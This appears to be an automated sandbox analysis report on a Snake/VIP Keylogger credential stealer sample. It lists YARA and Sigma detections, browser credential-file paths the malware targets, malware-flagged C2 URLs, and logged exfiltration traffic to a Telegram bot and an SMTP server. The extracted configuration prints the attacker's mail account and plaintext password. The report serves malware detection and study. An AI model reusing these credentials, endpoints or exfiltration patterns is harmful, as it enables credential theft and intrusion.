2.2.RegSvcs.exe.2b60ee8.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2b60ee8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3caba:$a1: get_encryptedPassword 0x3ca8e:$a2: get_encryptedUsername 0x3cb52:$a3: get_timePasswordChanged 0x3ca6a:$a4: get_passwordField 0x3cad0:$a5: set_encryptedPassword 0x3c89d:$a7: get_logins 0x37f05:$a10: KeyLoggerEventArgs 0x37ed4:$a11: KeyLoggerEventArgsEventHandler 0x3c971:$a13: _encryptedPassword
2.2.RegSvcs.exe.2b60ee8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47c00:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x472a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47500:$a4: \Orbitum\User Data\Default\Login Data 0x47edf:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2b60ee8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a65b:$s1: UnHook 0x3a5f7:$s2: SetHook 0x3a630:$s3: CallNextHook 0x3a5bf:$s4: _hook
2.2.RegSvcs.exe.2b60000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2b60000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2b60000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2b60000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2b60000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d9a2:$a1: get_encryptedPassword 0x3d976:$a2: get_encryptedUsername 0x3da3a:$a3: get_timePasswordChanged 0x3d952:$a4: get_passwordField 0x3d9b8:$a5: set_encryptedPassword 0x3d785:$a7: get_logins 0x38ded:$a10: KeyLoggerEventArgs 0x38dbc:$a11: KeyLoggerEventArgsEventHandler 0x3d859:$a13: _encryptedPassword
2.2.RegSvcs.exe.2b60000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48ae8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4818b:$a3: \Google\Chrome\User Data\Default\Login Data 0x483e8:$a4: \Orbitum\User Data\Default\Login Data 0x48dc7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2b60000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b543:$s1: UnHook 0x3b4df:$s2: SetHook 0x3b518:$s3: CallNextHook 0x3b4a7:$s4: _hook
2.2.RegSvcs.exe.2a7a93e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2a7a93e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2a7a93e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2a7a93e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2a7a93e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3caba:$a1: get_encryptedPassword 0x3ca8e:$a2: get_encryptedUsername 0x3cb52:$a3: get_timePasswordChanged 0x3ca6a:$a4: get_passwordField 0x3cad0:$a5: set_encryptedPassword 0x3c89d:$a7: get_logins 0x37f05:$a10: KeyLoggerEventArgs 0x37ed4:$a11: KeyLoggerEventArgsEventHandler 0x3c971:$a13: _encryptedPassword
2.2.RegSvcs.exe.2a7a93e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47c00:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x472a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47500:$a4: \Orbitum\User Data\Default\Login Data 0x47edf:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2a7a93e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a65b:$s1: UnHook 0x3a5f7:$s2: SetHook 0x3a630:$s3: CallNextHook 0x3a5bf:$s4: _hook
Click to see the 73 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DesusertionIp: 202.4.96.3, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7692, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 58267

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: malware
Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "commercial@logosbd.net", "Password": "C#mal@919%", "Host": "mail.logosbd.net", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: rcrypt.exe

ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: rcrypt.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: rcrypt.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49707 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49725 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: rcrypt.exe, 00000000.00000003.1316634913.0000000003440000.00000004.00001000.00020000.00000000.sdmp, rcrypt.exe, 00000000.00000003.1315742393.0000000003590000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rcrypt.exe, 00000000.00000003.1316634913.0000000003440000.00000004.00001000.00020000.00000000.sdmp, rcrypt.exe, 00000000.00000003.1315742393.0000000003590000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00154696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00154696
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015C93C FindFirstFileW,FindClose,	0_2_0015C93C
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0015C9C7
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0015F200
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0015F35D
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0015F65E
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00153A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00153A2B
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00153D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00153D4E
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0015BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0015BF27

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_0291DEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02EFE4C5h	2_2_02EFE307
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02EFF781h	2_2_02EFF4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02EFE4C5h	2_2_02EFE514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_02EFE9E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02EFFBD9h	2_2_02EFF92B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053B021Dh	2_2_053B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053B0BA7h	2_2_053B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053B24ADh	2_2_053B2090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053B1D39h	2_2_053B1A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BEFE1h	2_2_053BED38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BF439h	2_2_053BF190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BF891h	2_2_053BF5E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BC471h	2_2_053BC1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BE2D9h	2_2_053BE030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BE731h	2_2_053BE488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053B24ADh	2_2_053B2081
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BEB89h	2_2_053BE8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BD5D1h	2_2_053BD328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BDA29h	2_2_053BD780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053B24ADh	2_2_053B23DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BDE81h	2_2_053BDBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BC8C9h	2_2_053BC620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BCD21h	2_2_053BCA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BFCE9h	2_2_053BFA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 053BD179h	2_2_053BCED0

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.9:58267 -> 202.4.96.3:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2025/07/2024%20/%2001:28:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic

TCP traffic: 192.168.2.9:58267 -> 202.4.96.3:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49707 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	TCP traffic detected without corresponding DNS query: 202.4.96.3
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_001625E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_001625E2

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2025/07/2024%20/%2001:28:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.logosbd.net

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 24 Jul 2024 12:47:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000002.00000002.3772899142.00000000030BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.3776103096.0000000005433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com
Source: RegSvcs.exe, 00000002.00000002.3772899142.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3770897205.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3776103096.0000000005433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegSvcs.exe, 00000002.00000002.3770897205.0000000000E56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegSvcs.exe, 00000002.00000002.3772899142.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3770897205.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3776103096.0000000005433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: RegSvcs.exe, 00000002.00000002.3772899142.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3776103096.0000000005433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: RegSvcs.exe, 00000002.00000002.3772899142.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://logosbd.net
Source: RegSvcs.exe, 00000002.00000002.3772899142.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.00000000030BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.logosbd.net
Source: RegSvcs.exe, 00000002.00000002.3772899142.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3770897205.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3776103096.0000000005433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
